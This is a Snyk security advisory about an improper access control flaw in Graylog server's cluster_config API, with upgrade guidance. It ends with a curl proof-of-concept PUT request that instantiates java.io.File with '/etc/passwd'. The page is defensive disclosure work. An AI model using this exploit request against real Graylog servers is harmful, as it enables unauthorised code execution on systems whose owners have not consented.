Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsLearn about Improper Access Control vulnerabilities in an interactive lesson.
Start learningUpgrade org.graylog2:graylog2-server
to version 5.1.11, 5.2.4 or higher.
org.graylog2:graylog2-server is a log management platform.
Affected versions of this package are vulnerable to Improper Access Control via the /api/system/cluster_config/
endpoint. An attacker can execute arbitrary code that is run during class instantiation by sending a specially crafted HTTP PUT request.
Note:
This is only exploitable if the attacker possesses the clusterconfigentry:create
and clusterconfigentry:edit
permissions, which are typically only granted to Admin
users.
curl -u admin:<admin-password> -X PUT http://localhost:9000/api/system/cluster_config/java.io.File \
-H "Content-Type: application/json" \
-H "X-Requested-By: poc" \
-d '"/etc/passwd"'